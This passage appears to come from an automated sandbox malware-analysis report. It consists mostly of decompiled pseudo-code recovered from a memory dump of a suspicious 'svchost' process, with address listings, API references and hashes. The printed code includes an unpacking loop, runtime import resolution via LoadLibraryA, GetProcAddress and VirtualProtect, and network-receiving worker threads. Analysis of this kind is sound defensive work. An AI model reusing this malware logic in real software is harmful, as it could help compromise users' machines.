                                                                                                                                                                                                                                                                      											goto L14;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										__eflags = _v416 - 0x2710;
                                                                                                                                                                                                                                                                      										if(_v416 >= 0x2710) {
                                                                                                                                                                                                                                                                      											goto L14;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										 *0x4088c2c = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                      										_t103 = E040023E0( *((intOrPtr*)(0x4088c1c + _v408 * 4))); // executed
                                                                                                                                                                                                                                                                      										_t180 =  &(_t180[1]);
                                                                                                                                                                                                                                                                      										_v420 = _t103;
                                                                                                                                                                                                                                                                      										__eflags = _v420;
                                                                                                                                                                                                                                                                      										if(_v420 != 0) {
                                                                                                                                                                                                                                                                      											E04001DC0(_v420, 0x4085600); // executed
                                                                                                                                                                                                                                                                      											_t117 = E04001470(0xc);
                                                                                                                                                                                                                                                                      											_t180 =  &(_t180[3]);
                                                                                                                                                                                                                                                                      											_v440 = _t117;
                                                                                                                                                                                                                                                                      											_v424 = _v440;
                                                                                                                                                                                                                                                                      											 *_v424 =  *(0x4088c1c + _v408 * 4);
                                                                                                                                                                                                                                                                      											 *(_v424 + 4) = _v420;
                                                                                                                                                                                                                                                                      											 *((intOrPtr*)(_v424 + 8)) = 0x4085600;
                                                                                                                                                                                                                                                                      											CreateThread(0, 0, E04001630, _v424, 0, 0); // executed
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										_v428 = 0;
                                                                                                                                                                                                                                                                      										while(1) {
                                                                                                                                                                                                                                                                      											__eflags = _v428 - 3;
                                                                                                                                                                                                                                                                      											if(_v428 >= 3) {
                                                                                                                                                                                                                                                                      												break;
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      											_t106 = E040023E0( *((intOrPtr*)(0x4088c20 + (_v412 + _v428) * 4))); // executed
                                                                                                                                                                                                                                                                      											_t180 =  &(_t180[1]);
                                                                                                                                                                                                                                                                      											_v432 = _t106;
                                                                                                                                                                                                                                                                      											__eflags = _v432;
                                                                                                                                                                                                                                                                      											if(_v432 != 0) {
                                                                                                                                                                                                                                                                      												E04001DC0(_v432, 0x4085600); // executed
                                                                                                                                                                                                                                                                      												_t111 = E04001470(0xc);
                                                                                                                                                                                                                                                                      												_t180 =  &(_t180[3]);
                                                                                                                                                                                                                                                                      												_v444 = _t111;
                                                                                                                                                                                                                                                                      												_v436 = _v444;
                                                                                                                                                                                                                                                                      												_t164 = _v412 + _v428;
                                                                                                                                                                                                                                                                      												__eflags = _t164;
                                                                                                                                                                                                                                                                      												 *_v436 =  *(0x4088c20 + _t164 * 4);
                                                                                                                                                                                                                                                                      												 *(_v436 + 4) = _v432;
                                                                                                                                                                                                                                                                      												 *((intOrPtr*)(_v436 + 8)) = 0x4085600;
                                                                                                                                                                                                                                                                      												CreateThread(0, 0, E04001630, _v436, 0, 0); // executed
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      											_t108 =  &(_v428->nLength);
                                                                                                                                                                                                                                                                      											__eflags = _t108;
                                                                                                                                                                                                                                                                      											_v428 = _t108;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										WaitForSingleObject( *0x4088c2c, 0xffffffff);
                                                                                                                                                                                                                                                                      										Sleep(0x9c40);
                                                                                                                                                                                                                                                                      										L04001006();
                                                                                                                                                                                                                                                                      										goto L17;
                                                                                                                                                                                                                                                                      										L14:
                                                                                                                                                                                                                                                                      										Sleep(0x7530);
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_t178 = _t79 >> 1;
                                                                                                                                                                                                                                                                      								goto L39;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_t140 =  *_t177;
                                                                                                                                                                                                                                                                      							_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                      							asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                      							if(_t177 < 0) {
                                                                                                                                                                                                                                                                      								goto L34;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							L28:
                                                                                                                                                                                                                                                                      							_t73 = _t73 - 1;
                                                                                                                                                                                                                                                                      							_t138 = _t140 + _t140;
                                                                                                                                                                                                                                                                      							if(_t138 == 0) {
                                                                                                                                                                                                                                                                      								_t138 =  *_t177;
                                                                                                                                                                                                                                                                      								_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                      								asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							asm("adc eax, eax");
                                                                                                                                                                                                                                                                      							_t139 = _t138 + _t138;
                                                                                                                                                                                                                                                                      							if(_t139 == 0) {
                                                                                                                                                                                                                                                                      								_t139 =  *_t177;
                                                                                                                                                                                                                                                                      								_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                      								asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							asm("adc eax, eax");
                                                                                                                                                                                                                                                                      							_t140 = _t139 + _t139;
                                                                                                                                                                                                                                                                      							_t186 = _t140;
                                                                                                                                                                                                                                                                      							if(_t186 >= 0) {
                                                                                                                                                                                                                                                                      								goto L28;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						L19:
                                                                                                                                                                                                                                                                      						_t138 = _t138 + _t138;
                                                                                                                                                                                                                                                                      						__eflags = _t138;
                                                                                                                                                                                                                                                                      					} while (_t138 != 0);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}























































                                                                                                                                                                                                                                                                      0x0408bf20
                                                                                                                                                                                                                                                                      0x0408bf21
                                                                                                                                                                                                                                                                      0x0408bf26
                                                                                                                                                                                                                                                                      0x0408bf26
                                                                                                                                                                                                                                                                      0x0408bf2c
                                                                                                                                                                                                                                                                      0x0408bf3a
                                                                                                                                                                                                                                                                      0x0408bf3a
                                                                                                                                                                                                                                                                      0x0408bf3c
                                                                                                                                                                                                                                                                      0x0408bf3f
                                                                                                                                                                                                                                                                      0x0408bf41
                                                                                                                                                                                                                                                                      0x0408bf41
                                                                                                                                                                                                                                                                      0x0408bf30
                                                                                                                                                                                                                                                                      0x0408bf32
                                                                                                                                                                                                                                                                      0x0408bf33
                                                                                                                                                                                                                                                                      0x0408bf35
                                                                                                                                                                                                                                                                      0x0408bf35
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0408bf35
                                                                                                                                                                                                                                                                      0x0408bf43
                                                                                                                                                                                                                                                                      0x0408bf48
                                                                                                                                                                                                                                                                      0x0408bf48
                                                                                                                                                                                                                                                                      0x0408bf4a
                                                                                                                                                                                                                                                                      0x0408bf4c
                                                                                                                                                                                                                                                                      0x0408bf4e
                                                                                                                                                                                                                                                                      0x0408bf51
                                                                                                                                                                                                                                                                      0x0408bf51
                                                                                                                                                                                                                                                                      0x0408bf53
                                                                                                                                                                                                                                                                      0x0408bf55
                                                                                                                                                                                                                                                                      0x0408bf55
                                                                                                                                                                                                                                                                      0x0408bf57
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0408bf59
                                                                                                                                                                                                                                                                      0x0408bf59
                                                                                                                                                                                                                                                                      0x0408bf83
                                                                                                                                                                                                                                                                      0x0408bf83
                                                                                                                                                                                                                                                                      0x0408bf85
                                                                                                                                                                                                                                                                      0x0408bf85
                                                                                                                                                                                                                                                                      0x0408bf88
                                                                                                                                                                                                                                                                      0x0408bf9b
                                                                                                                                                                                                                                                                      0x0408bf9b
                                                                                                                                                                                                                                                                      0x0408bf9d
                                                                                                                                                                                                                                                                      0x0408bf9f
                                                                                                                                                                                                                                                                      0x0408bfa1
                                                                                                                                                                                                                                                                      0x0408bfa4
                                                                                                                                                                                                                                                                      0x0408bfa4
                                                                                                                                                                                                                                                                      0x0408bfa6
                                                                                                                                                                                                                                                                      0x0408bfa6
                                                                                                                                                                                                                                                                      0x0408bf74
                                                                                                                                                                                                                                                                      0x0408bf74
                                                                                                                                                                                                                                                                      0x0408bf74
                                                                                                                                                                                                                                                                      0x0408bf76
                                                                                                                                                                                                                                                                      0x0408bf78
                                                                                                                                                                                                                                                                      0x0408bf7a
                                                                                                                                                                                                                                                                      0x0408bf7d
                                                                                                                                                                                                                                                                      0x0408bf7d
                                                                                                                                                                                                                                                                      0x0408bf7f
                                                                                                                                                                                                                                                                      0x0408bfd5
                                                                                                                                                                                                                                                                      0x0408bfd5
                                                                                                                                                                                                                                                                      0x0408bfdb
                                                                                                                                                                                                                                                                      0x0408bfde
                                                                                                                                                                                                                                                                      0x0408bfe1
                                                                                                                                                                                                                                                                      0x0408bfe4
                                                                                                                                                                                                                                                                      0x0408bff4
                                                                                                                                                                                                                                                                      0x0408bff4
                                                                                                                                                                                                                                                                      0x0408bff6
                                                                                                                                                                                                                                                                      0x0408bff9
                                                                                                                                                                                                                                                                      0x0408bffb
                                                                                                                                                                                                                                                                      0x0408bffe
                                                                                                                                                                                                                                                                      0x0408bffe
                                                                                                                                                                                                                                                                      0x0408bffe
                                                                                                                                                                                                                                                                      0x0408c003
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0408bfe6
                                                                                                                                                                                                                                                                      0x0408bfe6
                                                                                                                                                                                                                                                                      0x0408bfe6
                                                                                                                                                                                                                                                                      0x0408bfe8
                                                                                                                                                                                                                                                                      0x0408bfe9
                                                                                                                                                                                                                                                                      0x0408bfeb
                                                                                                                                                                                                                                                                      0x0408bfec
                                                                                                                                                                                                                                                                      0x0408bfec
                                                                                                                                                                                                                                                                      0x0408bfec
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0408bfef
                                                                                                                                                                                                                                                                      0x0408bfa8
                                                                                                                                                                                                                                                                      0x0408bfa9
                                                                                                                                                                                                                                                                      0x0408bfa9
                                                                                                                                                                                                                                                                      0x0408bfab
                                                                                                                                                                                                                                                                      0x0408bfad
                                                                                                                                                                                                                                                                      0x0408bfaf
                                                                                                                                                                                                                                                                      0x0408bfb2
                                                                                                                                                                                                                                                                      0x0408bfb2
                                                                                                                                                                                                                                                                      0x0408bfb4
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0408bfb6
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0408bfb6
                                                                                                                                                                                                                                                                      0x0408bfb6
                                                                                                                                                                                                                                                                      0x0408bfb6
                                                                                                                                                                                                                                                                      0x0408bfb6
                                                                                                                                                                                                                                                                      0x0408bfb6
                                                                                                                                                                                                                                                                      0x0408bfb8
                                                                                                                                                                                                                                                                      0x0408bfba
                                                                                                                                                                                                                                                                      0x0408bfbc
                                                                                                                                                                                                                                                                      0x0408bfbf
                                                                                                                                                                                                                                                                      0x0408bfbf
                                                                                                                                                                                                                                                                      0x0408bfc1
                                                                                                                                                                                                                                                                      0x0408bfc3
                                                                                                                                                                                                                                                                      0x0408bfc3
                                                                                                                                                                                                                                                                      0x0408bfc3
                                                                                                                                                                                                                                                                      0x0408bfc7
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0408bfc9
                                                                                                                                                                                                                                                                      0x0408bfcb
                                                                                                                                                                                                                                                                      0x0408bfcb
                                                                                                                                                                                                                                                                      0x0408bfce
                                                                                                                                                                                                                                                                      0x0408bfce
                                                                                                                                                                                                                                                                      0x0408bfd2
                                                                                                                                                                                                                                                                      0x0408bfd2
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0408bfd2
                                                                                                                                                                                                                                                                      0x0408bfb4
                                                                                                                                                                                                                                                                      0x0408bf8d
                                                                                                                                                                                                                                                                      0x0408bf8f
                                                                                                                                                                                                                                                                      0x0408bf90
                                                                                                                                                                                                                                                                      0x0408bf90
                                                                                                                                                                                                                                                                      0x0408bf93
                                                                                                                                                                                                                                                                      0x0408c00a
                                                                                                                                                                                                                                                                      0x0408c00b
                                                                                                                                                                                                                                                                      0x0408c00d
                                                                                                                                                                                                                                                                      0x0408c012
                                                                                                                                                                                                                                                                      0x0408c012
                                                                                                                                                                                                                                                                      0x0408c012
                                                                                                                                                                                                                                                                      0x0408c012
                                                                                                                                                                                                                                                                      0x0408c014
                                                                                                                                                                                                                                                                      0x0408c017
                                                                                                                                                                                                                                                                      0x0408c017
                                                                                                                                                                                                                                                                      0x0408c01b
                                                                                                                                                                                                                                                                      0x0408c01b
                                                                                                                                                                                                                                                                      0x0408c029
                                                                                                                                                                                                                                                                      0x0408c035
                                                                                                                                                                                                                                                                      0x0408c037
                                                                                                                                                                                                                                                                      0x0408c03c
                                                                                                                                                                                                                                                                      0x0408c03e
                                                                                                                                                                                                                                                                      0x0408c03e
                                                                                                                                                                                                                                                                      0x0408c044
                                                                                                                                                                                                                                                                      0x0408c044
                                                                                                                                                                                                                                                                      0x0408c046
                                                                                                                                                                                                                                                                      0x0408c046
                                                                                                                                                                                                                                                                      0x0408c048
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0408c04a
                                                                                                                                                                                                                                                                      0x0408c054
                                                                                                                                                                                                                                                                      0x0408c057
                                                                                                                                                                                                                                                                      0x0408c057
                                                                                                                                                                                                                                                                      0x0408c060
                                                                                                                                                                                                                                                                      0x0408c061
                                                                                                                                                                                                                                                                      0x0408c063
                                                                                                                                                                                                                                                                      0x0408c064
                                                                                                                                                                                                                                                                      0x0408c066
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0408c06a
                                                                                                                                                                                                                                                                      0x0408c070
                                                                                                                                                                                                                                                                      0x0408c071
                                                                                                                                                                                                                                                                      0x0408c071
                                                                                                                                                                                                                                                                      0x0408c072
                                                                                                                                                                                                                                                                      0x0408c075
                                                                                                                                                                                                                                                                      0x0408c07e
                                                                                                                                                                                                                                                                      0x0408c07e
                                                                                                                                                                                                                                                                      0x0408c080
                                                                                                                                                                                                                                                                      0x0408c089
                                                                                                                                                                                                                                                                      0x0408c089
                                                                                                                                                                                                                                                                      0x0408c082
                                                                                                                                                                                                                                                                      0x0408c084
                                                                                                                                                                                                                                                                      0x0408c084
                                                                                                                                                                                                                                                                      0x0408c061
                                                                                                                                                                                                                                                                      0x0408c08f
                                                                                                                                                                                                                                                                      0x0408c08f
                                                                                                                                                                                                                                                                      0x0408c092
                                                                                                                                                                                                                                                                      0x0408c092
                                                                                                                                                                                                                                                                      0x0408c095
                                                                                                                                                                                                                                                                      0x0408c099
                                                                                                                                                                                                                                                                      0x0408c09a
                                                                                                                                                                                                                                                                      0x0408c09a
                                                                                                                                                                                                                                                                      0x0408c09c
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0408c09e
                                                                                                                                                                                                                                                                      0x0408c0a0
                                                                                                                                                                                                                                                                      0x0408c0b8
                                                                                                                                                                                                                                                                      0x0408c0bb
                                                                                                                                                                                                                                                                      0x0408c0bb
                                                                                                                                                                                                                                                                      0x0408c0a2
                                                                                                                                                                                                                                                                      0x0408c0a8
                                                                                                                                                                                                                                                                      0x0408c0af
                                                                                                                                                                                                                                                                      0x0408c0af
                                                                                                                                                                                                                                                                      0x0408c0c0
                                                                                                                                                                                                                                                                      0x0408c0c0
                                                                                                                                                                                                                                                                      0x0408c0c6
                                                                                                                                                                                                                                                                      0x0408c0c6
                                                                                                                                                                                                                                                                      0x0408c0cc
                                                                                                                                                                                                                                                                      0x0408c0d1
                                                                                                                                                                                                                                                                      0x0408c0d7
                                                                                                                                                                                                                                                                      0x0408c0d9
                                                                                                                                                                                                                                                                      0x0408c0d9
                                                                                                                                                                                                                                                                      0x0408c0df
                                                                                                                                                                                                                                                                      0x0408c0e2
                                                                                                                                                                                                                                                                      0x0408c0e2
                                                                                                                                                                                                                                                                      0x0408c0e2
                                                                                                                                                                                                                                                                      0x0408c0e6
                                                                                                                                                                                                                                                                      0x0408c0e7
                                                                                                                                                                                                                                                                      0x0408c0ec
                                                                                                                                                                                                                                                                      0x0408c0ef
                                                                                                                                                                                                                                                                      0x0408c0f0
                                                                                                                                                                                                                                                                      0x0408c0f4
                                                                                                                                                                                                                                                                      0x0408c0f4
                                                                                                                                                                                                                                                                      0x0408c0f6
                                                                                                                                                                                                                                                                      0x0408c0f6
                                                                                                                                                                                                                                                                      0x0408c0fa
                                                                                                                                                                                                                                                                      0x04001780
                                                                                                                                                                                                                                                                      0x04001781
                                                                                                                                                                                                                                                                      0x04001783
                                                                                                                                                                                                                                                                      0x04001789
                                                                                                                                                                                                                                                                      0x0400178f
                                                                                                                                                                                                                                                                      0x04001790
                                                                                                                                                                                                                                                                      0x04001795
                                                                                                                                                                                                                                                                      0x0400179a
                                                                                                                                                                                                                                                                      0x0400179c
                                                                                                                                                                                                                                                                      0x040019a0
                                                                                                                                                                                                                                                                      0x040019a2
                                                                                                                                                                                                                                                                      0x040019a2
                                                                                                                                                                                                                                                                      0x040017a2
                                                                                                                                                                                                                                                                      0x040017ac
                                                                                                                                                                                                                                                                      0x040017b6
                                                                                                                                                                                                                                                                      0x040017b6
                                                                                                                                                                                                                                                                      0x040017bb
                                                                                                                                                                                                                                                                      0x040017c1
                                                                                                                                                                                                                                                                      0x040017c8
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040017ce
                                                                                                                                                                                                                                                                      0x040017d8
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040017ec
                                                                                                                                                                                                                                                                      0x040017ff
                                                                                                                                                                                                                                                                      0x04001804
                                                                                                                                                                                                                                                                      0x04001807
                                                                                                                                                                                                                                                                      0x0400180d
                                                                                                                                                                                                                                                                      0x04001814
                                                                                                                                                                                                                                                                      0x04001822
                                                                                                                                                                                                                                                                      0x0400182c
                                                                                                                                                                                                                                                                      0x04001831
                                                                                                                                                                                                                                                                      0x04001834
                                                                                                                                                                                                                                                                      0x04001840
                                                                                                                                                                                                                                                                      0x04001859
                                                                                                                                                                                                                                                                      0x04001867
                                                                                                                                                                                                                                                                      0x04001870
                                                                                                                                                                                                                                                                      0x0400188b
                                                                                                                                                                                                                                                                      0x0400188b
                                                                                                                                                                                                                                                                      0x04001891
                                                                                                                                                                                                                                                                      0x040018ac
                                                                                                                                                                                                                                                                      0x040018ac
                                                                                                                                                                                                                                                                      0x040018b3
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040018cd
                                                                                                                                                                                                                                                                      0x040018d2
                                                                                                                                                                                                                                                                      0x040018d5
                                                                                                                                                                                                                                                                      0x040018db
                                                                                                                                                                                                                                                                      0x040018e2
                                                                                                                                                                                                                                                                      0x040018f4
                                                                                                                                                                                                                                                                      0x040018fe
                                                                                                                                                                                                                                                                      0x04001903
                                                                                                                                                                                                                                                                      0x04001906
                                                                                                                                                                                                                                                                      0x04001912
                                                                                                                                                                                                                                                                      0x0400191e
                                                                                                                                                                                                                                                                      0x0400191e
                                                                                                                                                                                                                                                                      0x04001931
                                                                                                                                                                                                                                                                      0x0400193f
                                                                                                                                                                                                                                                                      0x04001948
                                                                                                                                                                                                                                                                      0x04001963
                                                                                                                                                                                                                                                                      0x04001963
                                                                                                                                                                                                                                                                      0x040018a3
                                                                                                                                                                                                                                                                      0x040018a3
                                                                                                                                                                                                                                                                      0x040018a6
                                                                                                                                                                                                                                                                      0x040018a6
                                                                                                                                                                                                                                                                      0x04001976
                                                                                                                                                                                                                                                                      0x04001981
                                                                                                                                                                                                                                                                      0x0400199b
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400198b
                                                                                                                                                                                                                                                                      0x04001990
                                                                                                                                                                                                                                                                      0x04001996
                                                                                                                                                                                                                                                                      0x040017b6
                                                                                                                                                                                                                                                                      0x0408bf97
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0408bf97
                                                                                                                                                                                                                                                                      0x0408bf5b
                                                                                                                                                                                                                                                                      0x0408bf5d
                                                                                                                                                                                                                                                                      0x0408bf60
                                                                                                                                                                                                                                                                      0x0408bf62
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0408bf64
                                                                                                                                                                                                                                                                      0x0408bf64
                                                                                                                                                                                                                                                                      0x0408bf65
                                                                                                                                                                                                                                                                      0x0408bf67
                                                                                                                                                                                                                                                                      0x0408bf69
                                                                                                                                                                                                                                                                      0x0408bf6b
                                                                                                                                                                                                                                                                      0x0408bf6e
                                                                                                                                                                                                                                                                      0x0408bf6e
                                                                                                                                                                                                                                                                      0x0408bf70
                                                                                                                                                                                                                                                                      0x0408bf48
                                                                                                                                                                                                                                                                      0x0408bf4a
                                                                                                                                                                                                                                                                      0x0408bf4c
                                                                                                                                                                                                                                                                      0x0408bf4e
                                                                                                                                                                                                                                                                      0x0408bf51
                                                                                                                                                                                                                                                                      0x0408bf51
                                                                                                                                                                                                                                                                      0x0408bf53
                                                                                                                                                                                                                                                                      0x0408bf55
                                                                                                                                                                                                                                                                      0x0408bf55
                                                                                                                                                                                                                                                                      0x0408bf57
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0408bf57
                                                                                                                                                                                                                                                                      0x0408bf36
                                                                                                                                                                                                                                                                      0x0408bf36
                                                                                                                                                                                                                                                                      0x0408bf36
                                                                                                                                                                                                                                                                      0x0408bf36
                                                                                                                                                                                                                                                                      0x0408bf41

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 0408C05A
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,04089FF9), ref: 0408C078
                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32(?,04089FF9), ref: 0408C089
                                                                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(04000000,00001000,00000004,?,00000000), ref: 0408C0D7
                                                                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(04000000,00001000), ref: 0408C0EC
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1996367037-0
                                                                                                                                                                                                                                                                      • Opcode ID: 64764ee8238996737652da89ce96f32c0f690e677ce2c9ab463374656e08a4d0
                                                                                                                                                                                                                                                                      • Instruction ID: 20fcce43128c80cbc216fde34acc2cdd335751d52faa48733a5718032d389bea
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64764ee8238996737652da89ce96f32c0f690e677ce2c9ab463374656e08a4d0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA51F6716542525BE720AEB8CEC0664B7F0EB02264718073DE5E5EB3C3EBA0B8059F61
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 294 4001040-400104a 295 4001052-4001054 294->295 296 400104c-4001050 294->296 298 40010d3-40010d6 295->298 296->295 297 4001056 296->297 299 400105d-4001061 297->299 300 4001063-4001065 299->300 301 4001067-4001084 recv 299->301 300->298 302 4001086-400108c 301->302 303 400109f-40010a3 301->303 302->303 306 400108e-4001092 302->306 304 40010a5 303->304 305 40010a7-40010ab 303->305 307 40010c3-40010c7 304->307 308 40010ad 305->308 309 40010af-40010c1 305->309 306->303 310 4001094-400109d GetTickCount 306->310 311 40010d1 307->311 312 40010c9-40010cf 307->312 308->307 309->299 310->303 311->298 312->311
                                                                                                                                                                                                                                                                      C-Code - Quality: 79%
                                                                                                                                                                                                                                                                      			E04001040(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                                                                                                      				intOrPtr _t26;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				if(_a8 == 0 || _a12 < 0) {
                                                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_v8 = 0;
                                                                                                                                                                                                                                                                      					while(_a12 != 0) {
                                                                                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                                                                                      						_t26 = _a12;
                                                                                                                                                                                                                                                                      						_push(_t26);
                                                                                                                                                                                                                                                                      						_push(_a8 + _v8);
                                                                                                                                                                                                                                                                      						_push(_a4); // executed
                                                                                                                                                                                                                                                                      						L04001024(); // executed
                                                                                                                                                                                                                                                                      						_v12 = _t26;
                                                                                                                                                                                                                                                                      						if(_a20 != 0 &&  *_a20 == 0 && _v12 > 0) {
                                                                                                                                                                                                                                                                      							 *_a20 = GetTickCount();
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						if(_v12 >= 0) {
                                                                                                                                                                                                                                                                      							if(_v12 != 0) {
                                                                                                                                                                                                                                                                      								_v8 = _v8 + _v12;
                                                                                                                                                                                                                                                                      								_a12 = _a12 - _v12;
                                                                                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							goto L15;
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							L15:
                                                                                                                                                                                                                                                                      							if(_a16 != 0) {
                                                                                                                                                                                                                                                                      								 *_a16 = _v8;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							return 1;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}






                                                                                                                                                                                                                                                                      0x0400104a
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04001056
                                                                                                                                                                                                                                                                      0x04001056
                                                                                                                                                                                                                                                                      0x0400105d
                                                                                                                                                                                                                                                                      0x04001067
                                                                                                                                                                                                                                                                      0x04001069
                                                                                                                                                                                                                                                                      0x0400106c
                                                                                                                                                                                                                                                                      0x04001073
                                                                                                                                                                                                                                                                      0x04001077
                                                                                                                                                                                                                                                                      0x04001078
                                                                                                                                                                                                                                                                      0x0400107d
                                                                                                                                                                                                                                                                      0x04001084
                                                                                                                                                                                                                                                                      0x0400109d
                                                                                                                                                                                                                                                                      0x0400109d
                                                                                                                                                                                                                                                                      0x040010a3
                                                                                                                                                                                                                                                                      0x040010ab
                                                                                                                                                                                                                                                                      0x040010b5
                                                                                                                                                                                                                                                                      0x040010be
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040010be
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040010a5
                                                                                                                                                                                                                                                                      0x040010c3
                                                                                                                                                                                                                                                                      0x040010c7
                                                                                                                                                                                                                                                                      0x040010cf
                                                                                                                                                                                                                                                                      0x040010cf
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040010d1
                                                                                                                                                                                                                                                                      0x040010a3
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04001063

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • recv.WS2_32(?,00000000,?,00000000), ref: 04001078
                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 04001094
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CountTickrecv
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1874678310-0
                                                                                                                                                                                                                                                                      • Opcode ID: 6b4986c91a39f45b3505869805ead1539d7754d72571547b31f3d810936fcdc1
